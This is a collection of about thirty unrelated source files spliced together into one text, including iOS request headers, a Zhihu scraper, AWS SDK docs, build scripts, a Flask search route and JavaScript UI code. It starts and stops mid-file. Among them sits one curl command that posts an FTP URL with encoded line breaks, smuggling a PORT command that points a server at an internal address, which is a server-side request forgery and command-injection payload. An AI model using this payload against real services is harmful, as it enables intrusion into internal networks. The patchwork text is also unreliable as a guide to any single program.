这里可以看做是当前项目中,对所有请求的参数中,需要上传的参数 e.g.:服务器需要获取当前用户的操作网络,项目运行的系统环境等等 针对我们在进行数据请求的过程中,实际需要上传的参数,做出的处理就是讲Base参数采用NSMutableDictionary形式,统一合并 */ - (NSDictionary *)getDefaultParameters; /** 请求数据的处理 这里值比较重要的部分,请求到的数据在这里进行处理 比如获取用户数据,我们获取到的数据可以通过self.requestDic进行读取,通过相关的数据转型,可以采用MJExtension等方法(不多说),然后将获取到的数据,存放到self.requestDic中,Key_Model作为KEY,在数据请求成功中,进行数据获取 */ - (void)processResult; /** 取消当前对象的数据请求 这个针对的是TTBaseViewController中的cancelAllRequest,在销毁的当前页面的时候,建议将所有的数据请求调用该方法 */ + (void)cancelTheRequest; /** 判断是不是请求的数据是成功的数据 e.g.:因为存在有些数据请求,请求本身是成功的,但是返回的数据为错误信息,一般正常情况,服务器会返回给一定的约定的错误代码,根据实际情况进行相关的显示 */ - (BOOL)success; /** 请求结果的状态,请求码 */ - (NSInteger)statusCode; /** 获取数据请求的失败信息 */ - (NSString *)msg; /** 数据请求的全部个数 e.g.:主要应用于分页加载数据,获取当前数据请求针对接口数据的全部数据的数据,这个建议跟服务器进行对接 */ - (NSInteger)totalCount; /** 判断是不是还需要进行加载跟多的数据 这里结合上面的totalCount,判断当前数据是不是还需要进行加载跟多的数据 建议:在进行数据请求的过程,特别是分页数据的加载,服务器返回数据,添加Status(名称随意)数据模块,客户端进行统一解析 */ - (BOOL)hasMoreData; @end
<reponame>turoDog/LearningPython import requests from pyquery import PyQuery as pq url = 'https://www.zhihu.com/explore' headers = { 'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' '(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' } html = requests.get(url, headers=headers).text doc = pq(html) items = doc('.explore-tab .feed-item').items() for item in items: question = item.find('h2').text() author = item.find('.author-link-line').text() answer = pq(item.find('.content').html()).text() file = open('explore.txt','a', encoding='utf-8') file.write('\n'.join([question, author, answer])) file.write('\n' + '=' * 50 + '\n') file.close()
<filename>service/batch/doc.go<gh_stars>1000+ // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT. // Package batch provides the client and types for making API // requests to AWS Batch. // // Using Batch, you can run batch computing workloads on the Cloud. Batch computing // is a common means for developers, scientists, and engineers to access large // amounts of compute resources. Batch uses the advantages of this computing // workload to remove the undifferentiated heavy lifting of configuring and // managing required infrastructure. At the same time, it also adopts a familiar // batch computing software approach. Given these advantages, Batch can help // you to efficiently provision resources in response to jobs submitted, thus // effectively helping you to eliminate capacity constraints, reduce compute // costs, and deliver your results more quickly. // // As a fully managed service, Batch can run batch computing workloads of any // scale. Batch automatically provisions compute resources and optimizes workload // distribution based on the quantity and scale of your specific workloads. // With Batch, there's no need to install or manage batch computing software. // This means that you can focus your time and energy on analyzing results and // solving your specific problems. // // See https://docs.aws.amazon.com/goto/WebAPI/batch-2016-08-10 for more information on this service. // // See batch package documentation for more information. // https://docs.aws.amazon.com/sdk-for-go/api/service/batch/ // // Using the Client // // To contact AWS Batch with the SDK use the New function to create // a new service client. With that client you can make API requests to the service. // These clients are safe to use concurrently. // // See the SDK's documentation for more information on how to use the SDK. // https://docs.aws.amazon.com/sdk-for-go/api/ // // See aws.Config documentation for more information on configuring SDK clients. // https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config // // See the AWS Batch client Batch for more // information on creating client for this service. // https://docs.aws.amazon.com/sdk-for-go/api/service/batch/#New package batch
<gh_stars>0 #!/usr/bin/env python """ This module includes Money class which is a subclass of the Item class. Purpose of the module to learn how to use inheritance and polymorphizm in the python. Its free to use and change. writen by <NAME>. 16.06.2015 """ from Item import Item # # # object # # class Money(Item): """ subclass Money derived from Item superclass purpose of the Money class: to learn inheritance and polymorphizm in python """ def __init__(self): super(Money, self).__init__() Money._worth = 1 self._name = 'money' # # object property # def name(): doc = "The name property, keeps name of the Item and can't be changed" def fget(self): return self._name return locals() name = property(**name()) # # object static method # @staticmethod def setWorth(): """this medhot not much usefull""" Money._worth = 1
<reponame>sambhavdutt/fabric-test2<gh_stars>1-10 // Code generated by protoc-gen-go. // source: data.proto // DO NOT EDIT! /* Package main is a generated protocol buffer package. It is generated from these files: data.proto It has these top-level messages: PermissionedBlob */ package main import proto "github.com/golang/protobuf/proto" import fmt "fmt" import math "math" // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = fmt.Errorf var _ = math.Inf // This is a compile-time assertion to ensure that this generated file // is compatible with the proto package it is being compiled against. // A compilation error at this line likely means your copy of the // proto package needs to be updated. const _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package type PermissionedBlob struct { Owner []byte `protobuf:"bytes,1,opt,name=Owner,proto3" json:"Owner,omitempty"` Blob []byte `protobuf:"bytes,2,opt,name=Blob,proto3" json:"Blob,omitempty"` } func (m *PermissionedBlob) Reset() { *m = PermissionedBlob{} } func (m *PermissionedBlob) String() string { return proto.CompactTextString(m) } func (*PermissionedBlob) ProtoMessage() {} func (*PermissionedBlob) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{0} } func init() { proto.RegisterType((*PermissionedBlob)(nil), "main.PermissionedBlob") } func init() { proto.RegisterFile("data.proto", fileDescriptor0) } var fileDescriptor0 = []byte{ // 96 bytes of a gzipped FileDescriptorProto 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x4a, 0x49, 0x2c, 0x49, 0xd4, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x17, 0x62, 0xc9, 0x4d, 0xcc, 0xcc, 0x53, 0xb2, 0xe1, 0x12, 0x08, 0x48, 0x2d, 0xca, 0xcd, 0x2c, 0x2e, 0xce, 0xcc, 0xcf, 0x4b, 0x4d, 0x71, 0xca, 0xc9, 0x4f, 0x12, 0x12, 0xe1, 0x62, 0xf5, 0x2f, 0xcf, 0x4b, 0x2d, 0x92, 0x60, 0x54, 0x60, 0xd4, 0xe0, 0x09, 0x82, 0x70, 0x84, 0x84, 0xb8, 0x58, 0x40, 0xb2, 0x12, 0x4c, 0x60, 0x41, 0x30, 0x3b, 0x89, 0x0d, 0x6c, 0x94, 0x31, 0x20, 0x00, 0x00, 0xff, 0xff, 0x0a, 0xe0, 0xd3, 0xcf, 0x58, 0x00, 0x00, 0x00, }
#set( $symbol_pound = '#' ) #set( $symbol_dollar = '$' ) #set( $symbol_escape = '\' ) package ${package}; import com.google.inject.Guice; import com.google.inject.Injector; import cucumber.api.guice.CucumberModules; import cucumber.runtime.java.guice.InjectorSource; public class CucumberInjectorSource implements InjectorSource { @Override public Injector getInjector() { return Guice.createInjector(CucumberModules.SCENARIO, new GuiceModule()); } }
//============================================================================ // Copyright 2009-2020 ECMWF. // This software is licensed under the terms of the Apache Licence version 2.0 // which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. // In applying this licence, ECMWF does not waive the privileges and immunities // granted to it by virtue of its status as an intergovernmental organisation // nor does it submit to any jurisdiction. // //============================================================================ #ifndef VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ #define VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ #include <QToolButton> #include <map> class CaseSensitiveButton : public QToolButton { Q_OBJECT public: explicit CaseSensitiveButton(QWidget* parent=nullptr); protected Q_SLOTS: void slotClicked(bool); Q_SIGNALS: void changed(bool); private: std::map<bool,QString> tooltip_; }; #endif /* VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ */
#!/bin/bash set -xe scriptDir=$(cd $(dirname $0) && pwd) if [ "$TRAVIS_OS_NAME" = "osx" ]; then export PATH=/usr/local/opt/python/libexec/bin:$PATH fi $scriptDir/install_deps.sh if [ "$TRAVIS_OS_NAME" = "linux" ]; then # Xvfb needs to be running during testing and packaging /sbin/start-stop-daemon --start --quiet --pidfile /tmp/custom_xvfb_99.pid --make-pidfile \ --background --exec /usr/bin/Xvfb -- :99 -ac -screen 0 1280x1024x16 fi $scriptDir/build_and_test.sh export LD_LIBRARY_PATH=$TRAVIS_BUILD_DIR/build/install/lib $scriptDir/docs_and_package.sh
error_exit() { msg="$1" echo "" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo $1 echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" exit 1 }
package com.solvd.booking.reservation; public class InvalidCardNumberException extends Exception{ }
<filename>javafx-src/com/sun/webkit/dom/CommentImpl.java /* * Copyright (c) 2013, 2017, Oracle and/or its affiliates. All rights reserved. * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * * * * * * * * * * * * * * * * * * * */ package com.sun.webkit.dom; import org.w3c.dom.Comment; public class CommentImpl extends CharacterDataImpl implements Comment { CommentImpl(long peer) { super(peer); } static Comment getImpl(long peer) { return (Comment)create(peer); } }
/** * Demo a private page * * @see https://github.com/VulcanJS/vulcan-next/issues/49 * @see https://github.com/vercel/next.js/discussions/14531 */ import Link from "next/link"; import { NextPage } from "next"; import { withPrivateAccess } from "@vulcanjs/next-utils"; //import debug from "debug"; // const debugNext = debug("vns:next"); interface PrivatePageProps {} const PrivatePage: NextPage<PrivatePageProps> = (props) => { return ( <> <h1>private</h1> <div>Seeing a private page.</div> <div> <Link href="/vn/debug/public"> <a>Back to public page</a> </Link> </div> </> ); }; // NOTE: we use getInitialProps to demo redirect, in order to keep things consistent // with _app, that do not support getServerSideProps and getStaticProps at the time of writing (Next 9.4) // When redirecting in a page, you could achieve a cleaner setup using getServerSideProps (not demonstrated here) //PrivatePage.getInitialProps = async (ctx?: NextPageContext) => { // return pageProps; //}; export default withPrivateAccess({ isAllowedClient: async (props, ctx) => { /** * @client-only * Your logic to check if user is allowed, client-side * * Here we use a query param, in real life you might want to check * the presence of a cookie or a token in the localStorage * * The function is overly complex because router.query is sometimes empty, * but location.search is also outdated when running getInitialProps * So I have to differentiate scenarios * It would be simpler in a normal app (just a localStorage.get call) */ let isAllowed; if (ctx) { // We are in a getInitialProps call, ctx is providing infos about the URL // (window.location is still poiting to previous page so we can't use it) isAllowed = !!ctx.query.allowed; // demo } else { // We are in the component render, we can use window const urlParams = new URLSearchParams(window.location.search); isAllowed = !!urlParams.get("allowed"); } return { isAllowed }; }, isAllowedServer: async (props, ctx) => { // We can do async calls here const isAllowed = !!ctx.query.allowed; return { isAllowed }; }, defaultRedirection: "/vn/debug/public", })(PrivatePage);
/* * Copyright (C) 2016 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.graph; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.graph.GraphConstants.DEFAULT_NODE_COUNT; import static com.google.common.graph.Graphs.checkNonNegative; import java.util.Iterator; import java.util.Map; import java.util.Set; import java.util.TreeMap; import javax.annotation.CheckForNull; /** * Standard implementation of {@link ValueGraph} that supports the options supplied by {@link * AbstractGraphBuilder}. * * <p>This class maintains a map of nodes to {@link GraphConnections}. * * <p>Collection-returning accessors return unmodifiable views: the view returned will reflect * changes to the graph (if the graph is mutable) but may not be modified by the user. * * <p>The time complexity of all collection-returning accessors is O(1), since views are returned. * */
<reponame>Leodma/sisAre from app import db from app.busca import buscar from app.cadastros.models import Cadastro from app.tc.models import Termo from flask import render_template, flash, request, redirect, url_for from flask_login import login_required, login_user, current_user, login_required from app.busca.forms import BuscaForm @buscar.route('/busca' , methods=['GET', 'POST']) @login_required def busca(): opcoes_cadastro = [('numero', 'Número'), ('titulo','Título'),('cpf', 'CPF'), ('modalidade', 'Modalidade')] opcoes_termo = [('titulo','titulo'),('anexo', 'anexo'), ('conteudo','conteudo')] form = BuscaForm() form.criterio_cad.choices = opcoes_cadastro form.criterio_termo.choices = opcoes_termo if request.args.get('bd'): tipo = request.args.get('bd') else: tipo = 'Cadastros' if request.method == 'POST': busca = form.busca.data if tipo == "Cadastros": criterio = form.criterio_cad.data else: criterio = form.criterio_termo.data return redirect(url_for('buscar.busca_conteudo', tipo = tipo, criterio = criterio, conteudo = busca)) return render_template('busca.html', form=form) @buscar.route('/busca/<tipo>/<criterio>/<conteudo>') @login_required def busca_conteudo(tipo, criterio, conteudo): tipo = tipo criterio = criterio conteudo = conteudo if tipo == 'Cadastros': cadastros = Cadastro.query.filter(Cadastro.__dict__.__getitem__(criterio).like(f'%{conteudo}%')).all() return render_template('lista_cadastros.html', cadastros=cadastros, titulo = f'Cadastros encontrados com: {conteudo}' ) if tipo =='Termo de Compromisso': termos = Termo.query.filter(Termo.__dict__.__getitem__(criterio).like(f'%{conteudo}%')).all() return render_template('lista_termos.html', termos=termos, titulo = f'Termos encontrados com: {conteudo}' )
#!/usr/bin/env bash set -ue set -o pipefail rm -f Cargo.lock if [[ ${MINVER:-false} = true ]]; then sed -e '/^\[dependencies\]$/,/^[.*]$/s/"\([0-9]\)/"=\1/g' < Cargo.toml.bak > Cargo.toml fi cargo build --examples --verbose cargo test --verbose cp Cargo.toml.bak Cargo.toml
curl -i -H "Content-Type: application/json" -X POST -d '{"title": "mumma", "url": "ftp://vps102.vps.31173.se:6666/%0A%0APORT%20172,16,0,2,105,137/attack.jpg"}' http://localhost:5000/wines/
def insurance_claim(replacement_cost, deductible): amount_to_be_paid = replacement_cost - deductible return amount_to_be_paid if __name__ == '__main__': replacement_cost = 10000 deductible = 500 amount_to_be_paid = insurance_claim(replacement_cost, deductible) print(amount_to_be_paid)
#!/bin/bash source ./env/common.sh redis-server --maxmemory 40mb --maxmemory-policy allkeys-lru --save "" --appendonly no --dbfilename "" & mosquitto & cd src/embedding ./start_android_aarch64.sh & cd - cd src/face_detection ./start_android_aarch64.sh & cd - cd src/detector ./start_android_aarch64.sh & cd - cd src/monitor ./start_android_aarch64.sh & cd - while [ 1 ] do flower --port=5556 --address=0.0.0.0 sleep 20 done
<reponame>ashler2/be-nc-news const cors = require("cors"); const express = require("express"); const app = express(); const { apiRouter } = require("./routers/apiRouter"); const { errorPsql400s, send404UrlError, sendCustomError, error500s } = require("./error/error"); app.use(cors()); app.use(express.json()); app.use("/api", apiRouter); app.use(errorPsql400s); app.use(sendCustomError); app.use(error500s); app.all("/*", send404UrlError); module.exports = { app };
!function(e){if("object"==typeof exports)module.exports=e();else if("function"==typeof define&&define.amd)define(e);else{var f;"undefined"!=typeof window?f=window:"undefined"!=typeof global?f=global:"undefined"!=typeof self&&(f=self),f.Future=e()}}(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);throw new Error("Cannot find module '"+o+"'")}var f=n[o]={exports:{}};t[o][0].call(f.exports,function(e){var n=t[o][1][e];return s(n?n:e)},f,f.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. /** * @module lib/future */ module.exports = Future // -- Dependencies ----------------------------------------------------- var memoisedFork = _dereq_('./memoised').memoisedFork // -- Implementation --------------------------------------------------- /** * The `Future[α, β]` structure represents values that depend on time. This * allows one to model time-based effects explicitly, such that one can have * full knowledge of when they're dealing with delayed computations, latency, * or anything that can not be computed immediately. * * A common use for this structure is to replace the usual Continuation-Passing * Style form of programming, in order to be able to compose and sequence * time-dependent effects using the generic and powerful monadic operations. * * @class * @summary * ((α → Void), (β → Void) → Void) → Future[α, β] * * Future[α, β] <: Chain[β] * , Monad[β] * , Functor[β] * , Show */ function Future(f) { this.fork = f } /** * Creates a `Future[α, β]` that computes the action at most once. * * Since this function will remember the resolved value of the future, **it's * expected to be used only for pure actions,** otherwise you may not be able * to observe the effects. * * @summary ((α → Void), (β → Void) → Void) → Future[α, β] */ Future.prototype.memoise = function _memoise(f) { var future = new Future() future.fork = memoisedFork(f, future) return future } Future.memoise = Future.prototype.memoise /** * Constructs a new `Future[α, β]` containing the single value `β`. * * `β` can be any value, including `null`, `undefined`, or another * `Future[α, β]` structure. * * @summary β → Future[α, β] */ Future.prototype.of = function _of(b) { return new Future(function(_, resolve){ return resolve(b) }) } Future.of = Future.prototype.of // -- Functor ---------------------------------------------------------- /** * Transforms the successful value of the `Future[α, β]` using a regular unary * function. * * @summary @Future[α, β] => (β → γ) → Future[α, γ] */ Future.prototype.map = function _map(f) { return this.chain(function(a){ return Future.of(f(a)) }) } // -- Chain ------------------------------------------------------------ /** * Transforms the succesful value of the `Future[α, β]` using a function to a * monad. * * @summary @Future[α, β] => (β → Future[α, γ]) → Future[α, γ] */ Future.prototype.chain = function _chain(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(a) } , function(b){ return f(b).fork(reject, resolve) }) }.bind(this)) } // -- Show ------------------------------------------------------------- /** * Returns a textual representation of the `Future[α, β]` * * @summary @Future[α, β] => Void → String */ Future.prototype.toString = function _toString() { return 'Future' } // -- Extracting and recovering ---------------------------------------- /** * Transforms a failure value into a new `Future[α, β]`. Does nothing if the * structure already contains a successful value. * * @summary @Future[α, β] => (α → Future[γ, β]) → Future[γ, β] */ Future.prototype.orElse = function _orElse(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return f(a).fork(reject, resolve) } , function(b){ return resolve(b) }) }.bind(this)) } // -- Folds and extended transformations ------------------------------- /** * Catamorphism. Takes two functions, applies the leftmost one to the failure * value, and the rightmost one to the successful value, depending on which one * is present. * * @summary @Future[α, β] => (α → γ), (β → γ) → Future[δ, γ] */ Future.prototype.fold = function _fold(f, g) { return new Future(function(reject, resolve) { return this.fork( function(a){ return resolve(f(a)) } , function(b){ return resolve(g(b)) }) }.bind(this)) } /** * Swaps the disjunction values. * * @summary @Future[α, β] => Void → Future[β, α] */ Future.prototype.swap = function _swap() { return new Future(function(reject, resolve) { return this.fork( function(a){ return resolve(a) } , function(b){ return reject(b) }) }.bind(this)) } /** * Maps both sides of the disjunction. * * @summary @Future[α, β] => (α → γ), (β → δ) → Future[γ, δ] */ Future.prototype.bimap = function _bimap(f, g) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(f(a)) } , function(b){ return resolve(g(b)) }) }.bind(this)) } /** * Maps the left side of the disjunction (failure). * * @summary @Future[α, β] => (α → γ) → Future[γ, β] */ Future.prototype.rejectedMap = function _rejectedMap(f) { return new Future(function(reject, resolve) { return this.fork( function(a){ return reject(f(a)) } , function(b){ return resolve(b) }) }.bind(this)) } },{"./memoised":3}],2:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. module.exports = _dereq_('./future') },{"./future":1}],3:[function(_dereq_,module,exports){ // Copyright (c) 2013-2014 <NAME> <<EMAIL>> // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation files // (the "Software"), to deal in the Software without restriction, // including without limitation the rights to use, copy, modify, merge, // publish, distribute, sublicense, and/or sell copies of the Software, // and to permit persons to whom the Software is furnished to do so, // subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE // LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION // OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION // WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. /** * @module lib/memoised */ /** * A function that memoises the result of a future operation, for performance * of pure futures. * * @method * @summary ((α → Void), (β → Void) → Void), Future[α, β] → ((α → Void), (β → Void) → Void) */ exports.memoisedFork = memoisedFork function memoisedFork(f, future) { var pending = [] var started = false var resolved = false var rejected = false return fold // The fold applies the correct operation to the future's value, if the // future has been resolved. Or we run the operation instead. // // For optimisation purposes, we cache the result of the operation, so // if we started an operation before, we mark it as started and push // any subsequent forks into a pending queue that will be invoked once // the original fork returns. function fold(g, h) { return resolved? h(future.value) : rejected? g(future.value) : started? addToPendingOperations(g, h) : /* otherwise */ resolveFuture(g, h) } // Remembers some operation to fire at a later point in time, when the // future gets resolved function addToPendingOperations(g, h) { pending.push({ rejected: g, resolved: h }) } // Resolves the future, and memorises its value and resolution strategy function resolveFuture(g, h) { started = true return f( function(a) { rejected = true future.value = a invokePending('rejected', a) return g(a) } , function(b) { resolved = true future.value = b invokePending('resolved', b) return h(b) }) } // Invokes operations that were added before the future got a value function invokePending(kind, value) { var xs = pending started = false pending.length = 0 for (var i = 0; i < xs.length; ++i) xs[i][kind](value) } } },{}]},{},[2]) (2) });
declare module 'mxgraph' { class mxImage { constructor(src: string, width: number, height: number); /** * Variable: src * * String that specifies the URL of the image. */ src: string; /** * Variable: width * * Integer that specifies the width of the image. */ width: number; /** * Variable: height * * Integer that specifies the height of the image. */ height: number; } }
public class FilterNumberArray { public static void main(String[] args) { int[] array = {1, 2, 3, 4, 5, 6, 7, 8, 9}; int divisor = 2; int[] result = new int[array.length]; for (int i = 0; i < array.length; i++) { if (array[i] % divisor == 0) { result[i] = array[i]; } } System.out.print("["); for (int i = 0; i < result.length; i++) { if (result[i] != 0) { System.out.print(result[i] + ", "); } } System.out.println("]"); } }
import Navbar from "react-bootstrap/Navbar" import site from "../config/site" import Link from "next/link" import { FontAwesomeIcon } from "@fortawesome/react-fontawesome" import { faBug, faHome, faTags, faSearch, faFolder, faRss, faInfoCircle, } from "@fortawesome/free-solid-svg-icons" import Nav from "react-bootstrap/Nav" import NavDropdown from "react-bootstrap/NavDropdown" import { useRouter } from "next/router" export default function Header({ collections }) { const router = useRouter() const activeKey = router.pathname.startsWith("/tag/") ? "/tag" : router.pathname return ( <Navbar bg="light" expand="md" className="shadow-sm"> <Link href="/" passHref> <Navbar.Brand> <FontAwesomeIcon icon={faBug} fixedWidth size="lg" /> {site.title} </Navbar.Brand> </Link> <Navbar.Toggle /> <Navbar.Collapse> <Nav className="me-auto" activeKey={activeKey}> <Nav.Item> <Link href="/" passHref> <Nav.Link> <FontAwesomeIcon icon={faHome} fixedWidth /> 主页 </Nav.Link> </Link> </Nav.Item> <Nav.Item> <Link href="/tag/" passHref> <Nav.Link> <FontAwesomeIcon icon={faTags} fixedWidth /> 标签 </Nav.Link> </Link> </Nav.Item> <Nav.Item> <Link href="/search/" passHref> <Nav.Link> <FontAwesomeIcon icon={faSearch} fixedWidth /> 搜索 </Nav.Link> </Link> </Nav.Item> <NavDropdown title={ <> <FontAwesomeIcon icon={faFolder} fixedWidth /> 分类 </> } id="navbarDropdown" > {collections.map((collection) => ( <Link href={`/${collection.slug}/`} key={collection.slug} passHref > <NavDropdown.Item>{collection.name}</NavDropdown.Item> </Link> ))} </NavDropdown> <Nav.Item> <Nav.Link href={new URL("/atom.xml", site.url).href}> <FontAwesomeIcon icon={faRss} fixedWidth /> RSS </Nav.Link> </Nav.Item> </Nav> <Nav className="my-2 my-lg-0" activeKey={router.pathname}> <Nav.Item> <Link href="/about/" passHref> <Nav.Link> <FontAwesomeIcon icon={faInfoCircle} fixedWidth /> 关于 </Nav.Link> </Link> </Nav.Item> </Nav> </Navbar.Collapse> </Navbar> ) }
import arrayFrom from 'core-js-pure/stable/array/from'; import stringStartsWith from 'core-js-pure/stable/string/starts-with'; import { ZalgoPromise } from 'zalgo-promise/src'; import getModalMarkup from '../../services/modal'; import { Logger, ERRORS } from '../../services/logger'; import createContainer from '../Container'; import { initParent, getModalElements } from './utils'; import { createState, memoizeOnProps, pipe, pluck, nextId } from '../../../utils'; import { getModalContent, getModalType } from '../../../locale'; function createModal(options) { const wrapper = window.top.document.createElement('div'); const id = nextId(); wrapper.setAttribute('data-pp-id', id); const [iframe, { insertMarkup }] = createContainer('iframe'); const [parentOpen, parentClose] = initParent(); const { track, clickUrl } = options; const [state, setState] = createState({ status: 'CLOSED' }); const modalType = getModalType(options.offerCountry, options.offerType); const trackModalEvent = (type, linkName, amount) => track({ et: type === 'modal-open' ? 'CLIENT_IMPRESSION' : 'CLICK', link: linkName, amount, modal: modalType, event_type: type }); const modalContent = getModalContent(options, state, trackModalEvent); const logger = Logger.create({ id, account: options.account, selector: '__internal__', type: 'Modal' }); function ensureReady() { if (state.error) { // eslint-disable-next-line no-use-before-define return prepModal(true); } return state.modalProm; } function openModal(evt) { evt.preventDefault(); if (state.status === 'CLOSED' || state.status === 'CLOSING') { setState({ status: 'OPENING' }); ensureReady().then(() => { if (state.error) { setState({ status: 'CLOSED' }); window.open(clickUrl, '_blank'); return; } wrapper.style.display = 'block'; // Ensure iframe has been painted so that it's focusable in Firefox // Focus iframe window so that keyboard events interact with the modal requestAnimationFrame(() => requestAnimationFrame(() => { iframe.contentWindow.focus(); setState({ status: 'OPEN' }); parentOpen(); state.frameElements.modalContainer.classList.add('show'); trackModalEvent('modal-open'); }) ); }); } } function closeModal(delay) { return new ZalgoPromise((resolve, reject) => { if (state.status === 'OPEN' || state.status === 'OPENING') { setState({ status: 'CLOSING' }); state.frameElements.modalContainer.classList.remove('show'); setTimeout(() => { wrapper.style.display = 'none'; iframe.blur(); setState({ status: 'CLOSED' }); parentClose(); modalContent.onClose(); resolve(); }, delay || 0); } else { reject(); } }); } function closeEvent(link) { closeModal(350); trackModalEvent('modal-close', link); } function addModalEventHandlers() { state.frameElements.closeButton.addEventListener('click', () => { closeEvent('Close Button'); }); state.frameElements.overlay.addEventListener('click', ({ target }) => { if (target === state.frameElements.contentWrapper || target === state.frameElements.headerContainer) { closeEvent('Modal Overlay'); } }); const onScroll = () => { if (state.frameElements.contentWrapper.scrollTop > 0) { state.frameElements.header.classList.add('show'); } else { state.frameElements.header.classList.remove('show'); } }; state.frameElements.contentWrapper.addEventListener('scroll', onScroll); state.frameElements.contentWrapper.addEventListener('touchmove', onScroll); iframe.contentWindow.addEventListener('keyup', evt => { if (evt.key === 'Escape' || evt.key === 'Esc' || evt.charCode === 27) { closeEvent('Escape Key'); } }); arrayFrom(state.frameElements.landerLinks).forEach(link => { link.addEventListener('click', () => trackModalEvent('lander-link')); }); modalContent.addHandlers(modalType, state.contentElements, trackModalEvent); } function prepModal(ignoreCache = false) { // Account required in the start event on the server-side logger.start({ options: { account: options.account, offerType: options.offerType, amount: options.amount, message_id: options.id } }); return getModalMarkup(options, ignoreCache) .then(pipe(pluck('markup'), insertMarkup)) .then(() => { setState({ frameElements: getModalElements(iframe), contentElements: modalContent.getElements(iframe, modalType) }); addModalEventHandlers(); }) .catch(err => { if (__LOCAL__) { console.error(err); } logger.error({ name: ERRORS.MODAL_FAIL }); setState({ error: true }); }) .then(() => logger.end()); } // Accessibility tags wrapper.setAttribute('role', 'alertdialog'); wrapper.setAttribute('aria-label', 'PayPal Credit Promotion Modal'); wrapper.setAttribute( 'style', 'display: none; overflow: auto; -webkit-overflow-scrolling: touch; position: fixed; top: 0; left: 0; right: 0; bottom: 0; z-index: 2147483647; margin: 0; padding: 0; border: 0;' ); iframe.setAttribute( 'style', 'position: absolute; top: 0; left: 0; overflow: hidden; width: 100%; height: 100%; margin: 0; padding: 0; border: 0; display: block;' ); wrapper.appendChild(iframe); window.top.document.body.appendChild(wrapper); setState({ modalProm: prepModal() }); ensureReady().then(() => modalContent.onLoad()); return { open: openModal, close: closeModal }; } const getModal = memoizeOnProps(createModal, ['account', 'amount', 